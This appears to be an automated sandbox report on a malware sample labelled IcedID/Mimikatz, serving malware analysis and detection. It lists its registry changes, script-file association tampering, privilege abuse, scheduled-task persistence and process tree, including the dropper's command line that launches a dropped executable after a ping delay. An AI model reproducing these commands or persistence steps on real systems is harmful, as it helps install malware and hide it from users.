\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jirnzjt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jirnzjt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language llefvytvt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lsivtqwuf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4768 cmd.exe 4004 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x000a000000023b75-6.dat nsis_installer_2 behavioral1/files/0x000a000000023b97-15.dat nsis_installer_1 behavioral1/files/0x000a000000023b97-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" jirnzjt.exe Key created \REGISTRY\USER\.DEFAULT\Software vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" jirnzjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jirnzjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" jirnzjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" jirnzjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe -
Modifies registry class 17 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ jirnzjt.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" jirnzjt.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ jirnzjt.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" jirnzjt.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4004 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4844 schtasks.exe 1624 schtasks.exe 3372 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2916 jirnzjt.exe Token: SeDebugPrivilege 1668 jirnzjt.exe Token: SeDebugPrivilege 4516 vfshost.exe Token: SeDebugPrivilege 748 vrlgkrtsk.exe Token: SeLockMemoryPrivilege 1236 jngiyk.exe Token: SeLockMemoryPrivilege 1236 jngiyk.exe Token: SeDebugPrivilege 1320 vrlgkrtsk.exe Token: SeDebugPrivilege 4776 vrlgkrtsk.exe Token: SeDebugPrivilege 1900 vrlgkrtsk.exe Token: SeDebugPrivilege 3176 vrlgkrtsk.exe Token: SeDebugPrivilege 4908 vrlgkrtsk.exe Token: SeDebugPrivilege 4744 vrlgkrtsk.exe Token: SeDebugPrivilege 2172 vrlgkrtsk.exe Token: SeDebugPrivilege 4076 vrlgkrtsk.exe Token: SeDebugPrivilege 3920 vrlgkrtsk.exe Token: SeDebugPrivilege 3164 vrlgkrtsk.exe Token: SeDebugPrivilege 4372 vrlgkrtsk.exe Token: SeDebugPrivilege 4984 vrlgkrtsk.exe Token: SeDebugPrivilege 4776 vrlgkrtsk.exe Token: SeDebugPrivilege 2636 vrlgkrtsk.exe Token: SeDebugPrivilege 4916 vrlgkrtsk.exe Token: SeDebugPrivilege 4172 vrlgkrtsk.exe Token: SeBackupPrivilege 3156 svchost.exe Token: SeRestorePrivilege 3156 svchost.exe Token: SeSecurityPrivilege 3156 svchost.exe Token: SeTakeOwnershipPrivilege 3156 svchost.exe Token: 35 3156 svchost.exe Token: SeBackupPrivilege 3156 svchost.exe Token: SeRestorePrivilege 3156 svchost.exe Token: SeSecurityPrivilege 3156 svchost.exe Token: SeTakeOwnershipPrivilege 3156 svchost.exe Token: 35 3156 svchost.exe Token: SeDebugPrivilege 5680 vrlgkrtsk.exe Token: SeDebugPrivilege 5920 vrlgkrtsk.exe Token: SeDebugPrivilege 1524 vrlgkrtsk.exe Token: SeDebugPrivilege 6036 vrlgkrtsk.exe Token: SeDebugPrivilege 964 vrlgkrtsk.exe Token: SeDebugPrivilege 976 vrlgkrtsk.exe Token: SeDebugPrivilege 920 vrlgkrtsk.exe Token: SeDebugPrivilege 5844 vrlgkrtsk.exe Token: SeDebugPrivilege 2456 vrlgkrtsk.exe Token: SeDebugPrivilege 4864 vrlgkrtsk.exe Token: SeDebugPrivilege 3964 vrlgkrtsk.exe Token: SeDebugPrivilege 5176 vrlgkrtsk.exe Token: SeDebugPrivilege 2596 vrlgkrtsk.exe Token: SeDebugPrivilege 5520 vrlgkrtsk.exe Token: SeDebugPrivilege 5676 vrlgkrtsk.exe Token: SeDebugPrivilege 3196 vrlgkrtsk.exe -
Suspicious use of SetWindowsHookEx 61 IoCs
pid Process 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe 2916 jirnzjt.exe 2916 jirnzjt.exe 1668 jirnzjt.exe 1668 jirnzjt.exe 4152 xohudmc.exe 1116 skwigk.exe 1496 jirnzjt.exe 1496 jirnzjt.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 4792 OpenWith.exe 1104 jirnzjt.exe 1104 jirnzjt.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 372 OpenWith.exe 3556 jirnzjt.exe 3556 jirnzjt.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5352 OpenWith.exe 5348 jirnzjt.exe 5348 jirnzjt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1856 wrote to memory of 4768 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe 83 PID 1856 wrote to memory of 4768 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe 83 PID 1856 wrote to memory of 4768 1856 2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe 83 PID 4768 wrote to memory of 4004 4768 cmd.exe 85 PID 4768 wrote to memory of 4004 4768 cmd.exe 85 PID 4768 wrote to memory of 4004 4768 cmd.exe 85 PID 4768 wrote to memory of 2916 4768 cmd.exe 88 PID 4768 wrote to memory of 2916 4768 cmd.exe 88 PID 4768 wrote to memory of 2916 4768 cmd.exe 88 PID 1668 wrote to memory of 1328 1668 jirnzjt.exe 90 PID 1668 wrote to memory of 1328 1668 jirnzjt.exe 90 PID 1668 wrote to memory of 1328 1668 jirnzjt.exe 90 PID 1328 wrote to memory of 1384 1328 cmd.exe 92 PID 1328 wrote to memory of 1384 1328 cmd.exe 92 PID 1328 wrote to memory of 1384 1328 cmd.exe 92 PID 1328 wrote to memory of 1260 1328 cmd.exe 93 PID 1328 wrote to memory of 1260 1328 cmd.exe 93 PID 1328 wrote to memory of 1260 1328 cmd.exe 93 PID 1328 wrote to memory of 5036 1328 cmd.exe 95 PID 1328 wrote to memory of 5036 1328 cmd.exe 95 PID 1328 wrote to memory of 5036 1328 cmd.exe 95 PID 1328 wrote to memory of 964 1328 cmd.exe 96 PID 1328 wrote to memory of 964 1328 cmd.exe 96 PID 1328 wrote to memory of 964 1328 cmd.exe 96 PID 1328 wrote to memory of 4960 1328 cmd.exe 97 PID 1328 wrote to memory of 4960 1328 cmd.exe 97 PID 1328 wrote to memory of 4960 1328 cmd.exe 97 PID 1328 wrote to memory of 3832 1328 cmd.exe 98 PID 1328 wrote to memory of 3832 1328 cmd.exe 98 PID 1328 wrote to memory of 3832 1328 cmd.exe 98 PID 1668 wrote to memory of 2452 1668 jirnzjt.exe 99 PID 1668 wrote to memory of 2452 1668 jirnzjt.exe 99 PID 1668 wrote to memory of 2452 1668 jirnzjt.exe 99 PID 1668 wrote to memory of 3408 1668 jirnzjt.exe 101 PID 1668 wrote to memory of 3408 1668 jirnzjt.exe 101 PID 1668 wrote to memory of 3408 1668 jirnzjt.exe 101 PID 1668 wrote to memory of 3440 1668 jirnzjt.exe 103 PID 1668 wrote to memory of 3440 1668 jirnzjt.exe 103 PID 1668 wrote to memory of 3440 1668 jirnzjt.exe 103 PID 1668 wrote to memory of 2076 1668 jirnzjt.exe 118 PID 1668 wrote to memory of 2076 1668 jirnzjt.exe 118 PID 1668 wrote to memory of 2076 1668 jirnzjt.exe 118 PID 2076 wrote to memory of 3060 2076 cmd.exe 120 PID 2076 wrote to memory of 3060 2076 cmd.exe 120 PID 2076 wrote to memory of 3060 2076 cmd.exe 120 PID 3060 wrote to memory of 2760 3060 wpcap.exe 121 PID 3060 wrote to memory of 2760 3060 wpcap.exe 121 PID 3060 wrote to memory of 2760 3060 wpcap.exe 121 PID 2760 wrote to memory of 3340 2760 net.exe 123 PID 2760 wrote to memory of 3340 2760 net.exe 123 PID 2760 wrote to memory of 3340 2760 net.exe 123 PID 3060 wrote to memory of 4808 3060 wpcap.exe 124 PID 3060 wrote to memory of 4808 3060 wpcap.exe 124 PID 3060 wrote to memory of 4808 3060 wpcap.exe 124 PID 4808 wrote to memory of 1536 4808 net.exe 126 PID 4808 wrote to memory of 1536 4808 net.exe 126 PID 4808 wrote to memory of 1536 4808 net.exe 126 PID 3060 wrote to memory of 2024 3060 wpcap.exe 127 PID 3060 wrote to memory of 2024 3060 wpcap.exe 127 PID 3060 wrote to memory of 2024 3060 wpcap.exe 127 PID 2024 wrote to memory of 4640 2024 net.exe 129 PID 2024 wrote to memory of 4640 2024 net.exe 129 PID 2024 wrote to memory of 4640 2024 net.exe 129 PID 3060 wrote to memory of 372 3060 wpcap.exe 130
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1808
-
C:\Windows\TEMP\ibnltisvu\jngiyk.exe"C:\Windows\TEMP\ibnltisvu\jngiyk.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-08_67185fa9999bd87584927cab134afe81_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mgifenbt\jirnzjt.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4768 -
